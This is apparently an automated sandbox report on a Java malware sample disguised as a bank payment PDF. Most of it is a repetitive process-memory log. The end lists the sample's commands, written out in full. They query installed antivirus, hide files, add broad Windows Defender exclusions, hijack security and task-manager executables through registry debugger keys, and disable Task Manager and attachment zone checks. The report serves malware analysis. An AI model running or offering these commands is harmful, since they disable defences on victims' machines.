wrote to memory of 1664 1056 java.exe 197 PID 1056 wrote to memory of 1664 1056 java.exe 197 PID 1664 wrote to memory of 552 1664 cmd.exe 198 PID 1664 wrote to memory of 552 1664 cmd.exe 198 PID 1664 wrote to memory of 552 1664 cmd.exe 198 PID 1664 wrote to memory of 760 1664 cmd.exe 199 PID 1664 wrote to memory of 760 1664 cmd.exe 199 PID 1664 wrote to memory of 760 1664 cmd.exe 199 PID 1056 wrote to memory of 1692 1056 java.exe 200 PID 1056 wrote to memory of 1692 1056 java.exe 200 PID 1056 wrote to memory of 1692 1056 java.exe 200 PID 1692 wrote to memory of 1780 1692 cmd.exe 201 PID 1692 wrote to memory of 1780 1692 cmd.exe 201 PID 1692 wrote to memory of 1780 1692 cmd.exe 201 PID 1692 wrote to memory of 752 1692 cmd.exe 202 PID 1692 wrote to memory of 752 1692 cmd.exe 202 PID 1692 wrote to memory of 752 1692 cmd.exe 202 PID 1056 wrote to memory of 1788 1056 java.exe 203 PID 1056 wrote to memory of 1788 1056 java.exe 203 PID 1056 wrote to memory of 1788 1056 java.exe 203 PID 1788 wrote to memory of 1652 1788 cmd.exe 204 PID 1788 wrote to memory of 1652 1788 cmd.exe 204 PID 1788 wrote to memory of 1652 1788 cmd.exe 204 PID 1056 wrote to memory of 1852 1056 java.exe 205 PID 1056 wrote to memory of 1852 1056 java.exe 205 PID 1056 wrote to memory of 1852 1056 java.exe 205 PID 1788 wrote to memory of 1936 1788 cmd.exe 207 PID 1788 wrote to memory of 1936 1788 cmd.exe 207 PID 1788 wrote to memory of 1936 1788 cmd.exe 207 PID 1056 wrote to memory of 1608 1056 java.exe 208 PID 1056 wrote to memory of 1608 1056 java.exe 208 PID 1056 wrote to memory of 1608 1056 java.exe 208 PID 1608 wrote to memory of 1216 1608 cmd.exe 209 PID 1608 wrote to memory of 1216 1608 cmd.exe 209 PID 1608 wrote to memory of 1216 1608 cmd.exe 209 PID 1608 wrote to memory of 1824 1608 cmd.exe 210 PID 1608 wrote to memory of 1824 1608 cmd.exe 210 PID 1608 wrote to memory of 1824 1608 cmd.exe 210 PID 1056 wrote to memory of 1928 1056 java.exe 211 PID 1056 wrote to memory of 1928 1056 java.exe 211 PID 1056 wrote to memory of 1928 1056 java.exe 211 PID 1928 wrote to memory of 1796 1928 cmd.exe 212 PID 1928 wrote to memory of 1796 1928 cmd.exe 212 PID 1928 wrote to memory of 1796 1928 cmd.exe 212 PID 1928 wrote to memory of 1624 1928 cmd.exe 213 PID 1928 wrote to memory of 1624 1928 cmd.exe 213 PID 1928 wrote to memory of 1624 1928 cmd.exe 213 PID 1056 wrote to memory of 1708 1056 java.exe 214 PID 1056 wrote to memory of 1708 1056 java.exe 214 PID 1056 wrote to memory of 1708 1056 java.exe 214 PID 1708 wrote to memory of 1520 1708 cmd.exe 215 PID 1708 wrote to memory of 1520 1708 cmd.exe 215 PID 1708 wrote to memory of 1520 1708 cmd.exe 215 PID 1708 wrote to memory of 1088 1708 cmd.exe 216 PID 1708 wrote to memory of 1088 1708 cmd.exe 216 PID 1708 wrote to memory of 1088 1708 cmd.exe 216 PID 1056 wrote to memory of 824 1056 java.exe 217 PID 1056 wrote to memory of 824 1056 java.exe 217 PID 1056 wrote to memory of 824 1056 java.exe 217 PID 824 wrote to memory of 2000 824 cmd.exe 218 PID 824 wrote to memory of 2000 824 cmd.exe 218 PID 824 wrote to memory of 2000 824 cmd.exe 218 PID 824 wrote to memory of 2044 824 cmd.exe 219 PID 824 wrote to memory of 2044 824 cmd.exe 219 PID 824 wrote to memory of 2044 824 cmd.exe 219 PID 1056 wrote to memory of 660 1056 java.exe 220 PID 1056 wrote to memory of 660 1056 java.exe 220 PID 1056 wrote to memory of 660 1056 java.exe 220 PID 660 wrote to memory of 2008 660 cmd.exe 221 PID 660 wrote to memory of 2008 660 cmd.exe 221 PID 660 wrote to memory of 2008 660 cmd.exe 221 PID 660 wrote to memory of 2012 660 cmd.exe 222 PID 660 wrote to memory of 2012 660 cmd.exe 222 PID 660 wrote to memory of 2012 660 cmd.exe 222 PID 1056 wrote to memory of 1640 1056 java.exe 223 PID 1056 wrote to memory of 1640 1056 java.exe 223 PID 1056 wrote to memory of 1640 1056 java.exe 223 PID 1640 wrote to memory of 480 1640 cmd.exe 224 PID 1640 wrote to memory of 480 1640 cmd.exe 224 PID 1640 wrote to memory of 480 1640 cmd.exe 224 PID 1640 wrote to memory of 760 1640 cmd.exe 225 PID 1640 wrote to memory of 760 1640 cmd.exe 225 PID 1640 wrote to memory of 760 1640 cmd.exe 225 PID 1056 wrote to memory of 2032 1056 java.exe 226 PID 1056 wrote to memory of 2032 1056 java.exe 226 PID 1056 wrote to memory of 2032 1056 java.exe 226 PID 2032 wrote to memory of 1492 2032 cmd.exe 227 PID 2032 wrote to memory of 1492 2032 cmd.exe 227 PID 2032 wrote to memory of 1492 2032 cmd.exe 227 PID 2032 wrote to memory of 1568 2032 cmd.exe 228 PID 2032 wrote to memory of 1568 2032 cmd.exe 228 PID 2032 wrote to memory of 1568 2032 cmd.exe 228 PID 1056 wrote to memory of 2028 1056 java.exe 229 PID 1056 wrote to memory of 2028 1056 java.exe 229 PID 1056 wrote to memory of 2028 1056 java.exe 229 PID 1056 wrote to memory of 1332 1056 java.exe 230 PID 1056 wrote to memory of 1332 1056 java.exe 230 PID 1056 wrote to memory of 1332 1056 java.exe 230 PID 2028 wrote to memory of 1448 2028 cmd.exe 232 PID 2028 wrote to memory of 1448 2028 cmd.exe 232 PID 2028 wrote to memory of 1448 2028 cmd.exe 232 PID 2028 wrote to memory of 1552 2028 cmd.exe 233 PID 2028 wrote to memory of 1552 2028 cmd.exe 233 PID 2028 wrote to memory of 1552 2028 cmd.exe 233 PID 1056 wrote to memory of 892 1056 java.exe 234 PID 1056 wrote to memory of 892 1056 java.exe 234 PID 1056 wrote to memory of 892 1056 java.exe 234 PID 892 wrote to memory of 1596 892 cmd.exe 235 PID 892 wrote to memory of 1596 892 cmd.exe 235 PID 892 wrote to memory of 1596 892 cmd.exe 235 PID 892 wrote to memory of 108 892 cmd.exe 236 PID 892 wrote to memory of 108 892 cmd.exe 236 PID 892 wrote to memory of 108 892 cmd.exe 236 PID 1056 wrote to memory of 1652 1056 java.exe 237 PID 1056 wrote to memory of 1652 1056 java.exe 237 PID 1056 wrote to memory of 1652 1056 java.exe 237 PID 1652 wrote to memory of 1984 1652 cmd.exe 238 PID 1652 wrote to memory of 1984 1652 cmd.exe 238 PID 1652 wrote to memory of 1984 1652 cmd.exe 238 PID 1652 wrote to memory of 764 1652 cmd.exe 239 PID 1652 wrote to memory of 764 1652 cmd.exe 239 PID 1652 wrote to memory of 764 1652 cmd.exe 239 PID 1056 wrote to memory of 1376 1056 java.exe 240 PID 1056 wrote to memory of 1376 1056 java.exe 240 PID 1056 wrote to memory of 1376 1056 java.exe 240 PID 1376 wrote to memory of 1924 1376 cmd.exe 241 PID 1376 wrote to memory of 1924 1376 cmd.exe 241 PID 1376 wrote to memory of 1924 1376 cmd.exe 241 PID 1376 wrote to memory of 1824 1376 cmd.exe 242 PID 1376 wrote to memory of 1824 1376 cmd.exe 242 PID 1376 wrote to memory of 1824 1376 cmd.exe 242 PID 1056 wrote to memory of 1996 1056 java.exe 243 PID 1056 wrote to memory of 1996 1056 java.exe 243 PID 1056 wrote to memory of 1996 1056 java.exe 243 PID 1996 wrote to memory of 1644 1996 cmd.exe 244 PID 1996 wrote to memory of 1644 1996 cmd.exe 244 PID 1996 wrote to memory of 1644 1996 cmd.exe 244 PID 1996 wrote to memory of 1852 1996 cmd.exe 245 PID 1996 wrote to memory of 1852 1996 cmd.exe 245 PID 1996 wrote to memory of 1852 1996 cmd.exe 245 PID 1056 wrote to memory of 1656 1056 java.exe 246 PID 1056 wrote to memory of 1656 1056 java.exe 246 PID 1056 wrote to memory of 1656 1056 java.exe 246 PID 1656 wrote to memory of 1336 1656 cmd.exe 247 PID 1656 wrote to memory of 1336 1656 cmd.exe 247 PID 1656 wrote to memory of 1336 1656 cmd.exe 247 PID 1656 wrote to memory of 1808 1656 cmd.exe 248 PID 1656 wrote to memory of 1808 1656 cmd.exe 248 PID 1656 wrote to memory of 1808 1656 cmd.exe 248 PID 1056 wrote to memory of 1632 1056 java.exe 249 PID 1056 wrote to memory of 1632 1056 java.exe 249 PID 1056 wrote to memory of 1632 1056 java.exe 249 PID 1632 wrote to memory of 1036 1632 cmd.exe 250 PID 1632 wrote to memory of 1036 1632 cmd.exe 250 PID 1632 wrote to memory of 1036 1632 cmd.exe 250 PID 1632 wrote to memory of 1572 1632 cmd.exe 251 PID 1632 wrote to memory of 1572 1632 cmd.exe 251 PID 1632 wrote to memory of 1572 1632 cmd.exe 251 PID 1056 wrote to memory of 1084 1056 java.exe 252 PID 1056 wrote to memory of 1084 1056 java.exe 252 PID 1056 wrote to memory of 1084 1056 java.exe 252 PID 1056 wrote to memory of 1972 1056 java.exe 254 PID 1056 wrote to memory of 1972 1056 java.exe 254 PID 1056 wrote to memory of 1972 1056 java.exe 254 PID 1972 wrote to memory of 1804 1972 cmd.exe 255 PID 1972 wrote to memory of 1804 1972 cmd.exe 255 PID 1972 wrote to memory of 1804 1972 cmd.exe 255 PID 1972 wrote to memory of 1960 1972 cmd.exe 256 PID 1972 wrote to memory of 1960 1972 cmd.exe 256 PID 1972 wrote to memory of 1960 1972 cmd.exe 256 PID 1056 wrote to memory of 1900 1056 java.exe 257 PID 1056 wrote to memory of 1900 1056 java.exe 257 PID 1056 wrote to memory of 1900 1056 java.exe 257 PID 1900 wrote to memory of 1948 1900 cmd.exe 258 PID 1900 wrote to memory of 1948 1900 cmd.exe 258 PID 1900 wrote to memory of 1948 1900 cmd.exe 258 PID 1900 wrote to memory of 1920 1900 cmd.exe 259 PID 1900 wrote to memory of 1920 1900 cmd.exe 259 PID 1900 wrote to memory of 1920 1900 cmd.exe 259 PID 1056 wrote to memory of 1840 1056 java.exe 260 PID 1056 wrote to memory of 1840 1056 java.exe 260 PID 1056 wrote to memory of 1840 1056 java.exe 260 PID 1840 wrote to memory of 1584 1840 cmd.exe 261 PID 1840 wrote to memory of 1584 1840 cmd.exe 261 PID 1840 wrote to memory of 1584 1840 cmd.exe 261 PID 1840 wrote to memory of 480 1840 cmd.exe 262 PID 1840 wrote to memory of 480 1840 cmd.exe 262 PID 1840 wrote to memory of 480 1840 cmd.exe 262 PID 1056 wrote to memory of 1780 1056 java.exe 263 PID 1056 wrote to memory of 1780 1056 java.exe 263 PID 1056 wrote to memory of 1780 1056 java.exe 263 PID 1780 wrote to memory of 1120 1780 cmd.exe 264 PID 1780 wrote to memory of 1120 1780 cmd.exe 264 PID 1780 wrote to memory of 1120 1780 cmd.exe 264 PID 1780 wrote to memory of 1568 1780 cmd.exe 265 PID 1780 wrote to memory of 1568 1780 cmd.exe 265 PID 1780 wrote to memory of 1568 1780 cmd.exe 265 PID 1056 wrote to memory of 1112 1056 java.exe 266 PID 1056 wrote to memory of 1112 1056 java.exe 266 PID 1056 wrote to memory of 1112 1056 java.exe 266 PID 1112 wrote to memory of 1496 1112 cmd.exe 267 PID 1112 wrote to memory of 1496 1112 cmd.exe 267 PID 1112 wrote to memory of 1496 1112 cmd.exe 267 PID 1112 wrote to memory of 1552 1112 cmd.exe 268 PID 1112 wrote to memory of 1552 1112 cmd.exe 268 PID 1112 wrote to memory of 1552 1112 cmd.exe 268 PID 1056 wrote to memory of 1812 1056 java.exe 269 PID 1056 wrote to memory of 1812 1056 java.exe 269 PID 1056 wrote to memory of 1812 1056 java.exe 269 PID 1812 wrote to memory of 556 1812 cmd.exe 270 PID 1812 wrote to memory of 556 1812 cmd.exe 270 PID 1812 wrote to memory of 556 1812 cmd.exe 270 PID 1812 wrote to memory of 1340 1812 cmd.exe 271 PID 1812 wrote to memory of 1340 1812 cmd.exe 271 PID 1812 wrote to memory of 1340 1812 cmd.exe 271 PID 1056 wrote to memory of 1628 1056 java.exe 272 PID 1056 wrote to memory of 1628 1056 java.exe 272 PID 1056 wrote to memory of 1628 1056 java.exe 272 PID 1628 wrote to memory of 1596 1628 cmd.exe 273 PID 1628 wrote to memory of 1596 1628 cmd.exe 273 PID 1628 wrote to memory of 1596 1628 cmd.exe 273 PID 1628 wrote to memory of 1936 1628 cmd.exe 274 PID 1628 wrote to memory of 1936 1628 cmd.exe 274 PID 1628 wrote to memory of 1936 1628 cmd.exe 274 PID 1056 wrote to memory of 1844 1056 java.exe 275 PID 1056 wrote to memory of 1844 1056 java.exe 275 PID 1056 wrote to memory of 1844 1056 java.exe 275 PID 1844 wrote to memory of 764 1844 cmd.exe 276 PID 1844 wrote to memory of 764 1844 cmd.exe 276 PID 1844 wrote to memory of 764 1844 cmd.exe 276 PID 1844 wrote to memory of 1216 1844 cmd.exe 277 PID 1844 wrote to memory of 1216 1844 cmd.exe 277 PID 1844 wrote to memory of 1216 1844 cmd.exe 277 PID 1056 wrote to memory of 112 1056 java.exe 278 PID 1056 wrote to memory of 112 1056 java.exe 278 PID 1056 wrote to memory of 112 1056 java.exe 278 PID 112 wrote to memory of 1912 112 cmd.exe 279 PID 112 wrote to memory of 1912 112 cmd.exe 279 PID 112 wrote to memory of 1912 112 cmd.exe 279 PID 112 wrote to memory of 1644 112 cmd.exe 280 PID 112 wrote to memory of 1644 112 cmd.exe 280 PID 112 wrote to memory of 1644 112 cmd.exe 280 PID 1056 wrote to memory of 1820 1056 java.exe 281 PID 1056 wrote to memory of 1820 1056 java.exe 281 PID 1056 wrote to memory of 1820 1056 java.exe 281 PID 1820 wrote to memory of 684 1820 cmd.exe 282 PID 1820 wrote to memory of 684 1820 cmd.exe 282 PID 1820 wrote to memory of 684 1820 cmd.exe 282 PID 1820 wrote to memory of 1808 1820 cmd.exe 283 PID 1820 wrote to memory of 1808 1820 cmd.exe 283 PID 1820 wrote to memory of 1808 1820 cmd.exe 283 PID 1056 wrote to memory of 2004 1056 java.exe 284 PID 1056 wrote to memory of 2004 1056 java.exe 284 PID 1056 wrote to memory of 2004 1056 java.exe 284 PID 2004 wrote to memory of 1520 2004 cmd.exe 285 PID 2004 wrote to memory of 1520 2004 cmd.exe 285 PID 2004 wrote to memory of 1520 2004 cmd.exe 285 PID 2004 wrote to memory of 1612 2004 cmd.exe 286 PID 2004 wrote to memory of 1612 2004 cmd.exe 286 PID 2004 wrote to memory of 1612 2004 cmd.exe 286 PID 1056 wrote to memory of 2020 1056 java.exe 287 PID 1056 wrote to memory of 2020 1056 java.exe 287 PID 1056 wrote to memory of 2020 1056 java.exe 287 PID 1056 wrote to memory of 1116 1056 java.exe 288 PID 1056 wrote to memory of 1116 1056 java.exe 288 PID 1056 wrote to memory of 1116 1056 java.exe 288 PID 1116 wrote to memory of 2044 1116 cmd.exe 290 PID 1116 wrote to memory of 2044 1116 cmd.exe 290 PID 1116 wrote to memory of 2044 1116 cmd.exe 290 PID 1116 wrote to memory of 1916 1116 cmd.exe 291 PID 1116 wrote to memory of 1916 1116 cmd.exe 291 PID 1116 wrote to memory of 1916 1116 cmd.exe 291 PID 1056 wrote to memory of 584 1056 java.exe 292 PID 1056 wrote to memory of 584 1056 java.exe 292 PID 1056 wrote to memory of 584 1056 java.exe 292 PID 584 wrote to memory of 1524 584 cmd.exe 293 PID 584 wrote to memory of 1524 584 cmd.exe 293 PID 584 wrote to memory of 1524 584 cmd.exe 293 PID 584 wrote to memory of 1584 584 cmd.exe 294 PID 584 wrote to memory of 1584 584 cmd.exe 294 PID 584 wrote to memory of 1584 584 cmd.exe 294 PID 1056 wrote to memory of 1672 1056 java.exe 295 PID 1056 wrote to memory of 1672 1056 java.exe 295 PID 1056 wrote to memory of 1672 1056 java.exe 295 PID 1672 wrote to memory of 1120 1672 cmd.exe 296 PID 1672 wrote to memory of 1120 1672 cmd.exe 296 PID 1672 wrote to memory of 1120 1672 cmd.exe 296 PID 1672 wrote to memory of 1908 1672 cmd.exe 297 PID 1672 wrote to memory of 1908 1672 cmd.exe 297 PID 1672 wrote to memory of 1908 1672 cmd.exe 297 PID 1056 wrote to memory of 1136 1056 java.exe 298 PID 1056 wrote to memory of 1136 1056 java.exe 298 PID 1056 wrote to memory of 1136 1056 java.exe 298 PID 1136 wrote to memory of 1552 1136 cmd.exe 299 PID 1136 wrote to memory of 1552 1136 cmd.exe 299 PID 1136 wrote to memory of 1552 1136 cmd.exe 299 PID 1136 wrote to memory of 1368 1136 cmd.exe 300 PID 1136 wrote to memory of 1368 1136 cmd.exe 300 PID 1136 wrote to memory of 1368 1136 cmd.exe 300 PID 1056 wrote to memory of 2024 1056 java.exe 301 PID 1056 wrote to memory of 2024 1056 java.exe 301 PID 1056 wrote to memory of 2024 1056 java.exe 301 PID 2024 wrote to memory of 108 2024 cmd.exe 302 PID 2024 wrote to memory of 108 2024 cmd.exe 302 PID 2024 wrote to memory of 108 2024 cmd.exe 302 PID 2024 wrote to memory of 1596 2024 cmd.exe 303 PID 2024 wrote to memory of 1596 2024 cmd.exe 303 PID 2024 wrote to memory of 1596 2024 cmd.exe 303 PID 1056 wrote to memory of 1576 1056 java.exe 304 PID 1056 wrote to memory of 1576 1056 java.exe 304 PID 1056 wrote to memory of 1576 1056 java.exe 304 PID 1576 wrote to memory of 1924 1576 cmd.exe 305 PID 1576 wrote to memory of 1924 1576 cmd.exe 305 PID 1576 wrote to memory of 1924 1576 cmd.exe 305 PID 1576 wrote to memory of 1216 1576 cmd.exe 306 PID 1576 wrote to memory of 1216 1576 cmd.exe 306 PID 1576 wrote to memory of 1216 1576 cmd.exe 306 PID 1056 wrote to memory of 2036 1056 java.exe 307 PID 1056 wrote to memory of 2036 1056 java.exe 307 PID 1056 wrote to memory of 2036 1056 java.exe 307 PID 2036 wrote to memory of 1112 2036 cmd.exe 308 PID 2036 wrote to memory of 1112 2036 cmd.exe 308 PID 2036 wrote to memory of 1112 2036 cmd.exe 308 PID 2036 wrote to memory of 2012 2036 cmd.exe 309 PID 2036 wrote to memory of 2012 2036 cmd.exe 309 PID 2036 wrote to memory of 2012 2036 cmd.exe 309 PID 1056 wrote to memory of 1844 1056 java.exe 310 PID 1056 wrote to memory of 1844 1056 java.exe 310 PID 1056 wrote to memory of 1844 1056 java.exe 310 PID 1844 wrote to memory of 860 1844 cmd.exe 311 PID 1844 wrote to memory of 860 1844 cmd.exe 311 PID 1844 wrote to memory of 860 1844 cmd.exe 311 PID 1844 wrote to memory of 1376 1844 cmd.exe 312 PID 1844 wrote to memory of 1376 1844 cmd.exe 312 PID 1844 wrote to memory of 1376 1844 cmd.exe 312 PID 1056 wrote to memory of 1664 1056 java.exe 313 PID 1056 wrote to memory of 1664 1056 java.exe 313 PID 1056 wrote to memory of 1664 1056 java.exe 313 PID 1664 wrote to memory of 1900 1664 cmd.exe 314 PID 1664 wrote to memory of 1900 1664 cmd.exe 314 PID 1664 wrote to memory of 1900 1664 cmd.exe 314 PID 1664 wrote to memory of 1100 1664 cmd.exe 315 PID 1664 wrote to memory of 1100 1664 cmd.exe 315 PID 1664 wrote to memory of 1100 1664 cmd.exe 315 PID 1056 wrote to memory of 660 1056 java.exe 316 PID 1056 wrote to memory of 660 1056 java.exe 316 PID 1056 wrote to memory of 660 1056 java.exe 316 PID 660 wrote to memory of 1696 660 cmd.exe 317 PID 660 wrote to memory of 1696 660 cmd.exe 317 PID 660 wrote to memory of 1696 660 cmd.exe 317 PID 660 wrote to memory of 1608 660 cmd.exe 318 PID 660 wrote to memory of 1608 660 cmd.exe 318 PID 660 wrote to memory of 1608 660 cmd.exe 318 PID 1056 wrote to memory of 536 1056 java.exe 319 PID 1056 wrote to memory of 536 1056 java.exe 319 PID 1056 wrote to memory of 536 1056 java.exe 319 PID 536 wrote to memory of 1972 536 cmd.exe 320 PID 536 wrote to memory of 1972 536 cmd.exe 320 PID 536 wrote to memory of 1972 536 cmd.exe 320 PID 536 wrote to memory of 240 536 cmd.exe 321 PID 536 wrote to memory of 240 536 cmd.exe 321 PID 536 wrote to memory of 240 536 cmd.exe 321 PID 1056 wrote to memory of 1928 1056 java.exe 322 PID 1056 wrote to memory of 1928 1056 java.exe 322 PID 1056 wrote to memory of 1928 1056 java.exe 322 PID 1928 wrote to memory of 1008 1928 cmd.exe 323 PID 1928 wrote to memory of 1008 1928 cmd.exe 323 PID 1928 wrote to memory of 1008 1928 cmd.exe 323 PID 1928 wrote to memory of 1912 1928 cmd.exe 324 PID 1928 wrote to memory of 1912 1928 cmd.exe 324 PID 1928 wrote to memory of 1912 1928 cmd.exe 324 PID 1056 wrote to memory of 796 1056 java.exe 325 PID 1056 wrote to memory of 796 1056 java.exe 325 PID 1056 wrote to memory of 796 1056 java.exe 325 PID 796 wrote to memory of 1892 796 cmd.exe 326 PID 796 wrote to memory of 1892 796 cmd.exe 326 PID 796 wrote to memory of 1892 796 cmd.exe 326 PID 796 wrote to memory of 1808 796 cmd.exe 327 PID 796 wrote to memory of 1808 796 cmd.exe 327 PID 796 wrote to memory of 1808 796 cmd.exe 327 PID 1056 wrote to memory of 1572 1056 java.exe 328 PID 1056 wrote to memory of 1572 1056 java.exe 328 PID 1056 wrote to memory of 1572 1056 java.exe 328 PID 1056 wrote to memory of 1832 1056 java.exe 330 PID 1056 wrote to memory of 1832 1056 java.exe 330 PID 1056 wrote to memory of 1832 1056 java.exe 330 PID 1056 wrote to memory of 2020 1056 java.exe 332 PID 1056 wrote to memory of 2020 1056 java.exe 332 PID 1056 wrote to memory of 2020 1056 java.exe 332 PID 1056 wrote to memory of 376 1056 java.exe 334 PID 1056 wrote to memory of 376 1056 java.exe 334 PID 1056 wrote to memory of 376 1056 java.exe 334 PID 1056 wrote to memory of 1596 1056 java.exe 336 PID 1056 wrote to memory of 1596 1056 java.exe 336 PID 1056 wrote to memory of 1596 1056 java.exe 336 PID 1056 wrote to memory of 1840 1056 java.exe 338 PID 1056 wrote to memory of 1840 1056 java.exe 338 PID 1056 wrote to memory of 1840 1056 java.exe 338 PID 1056 wrote to memory of 1560 1056 java.exe 340 PID 1056 wrote to memory of 1560 1056 java.exe 340 PID 1056 wrote to memory of 1560 1056 java.exe 340 PID 1056 wrote to memory of 1476 1056 java.exe 342 PID 1056 wrote to memory of 1476 1056 java.exe 342 PID 1056 wrote to memory of 1476 1056 java.exe 342 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1776 attrib.exe 1664 attrib.exe 1652 attrib.exe 1716 attrib.exe 1820 attrib.exe 1268 attrib.exe 1832 attrib.exe 1784 attrib.exe
Processes
-
C:\Windows\system32\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Payment Advice Hsbc_pdf.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\system32\cmd.execmd.exe2⤵PID:108
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:1716
-
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:1820
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\ujTBR\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1268
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\ujTBR\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1832
-
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1784
-
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1776
-
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\ujTBR2⤵
- Views/modifies file attributes
PID:1664
-
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class2⤵
- Views/modifies file attributes
PID:1652
-
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:1908
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:1972
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1896
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1860
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:1864
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:1920
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1944
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1984
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:2036
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:2028
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:376
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:576
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:760
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:2004
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:1136
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:1500
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:860
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:1076
-
-
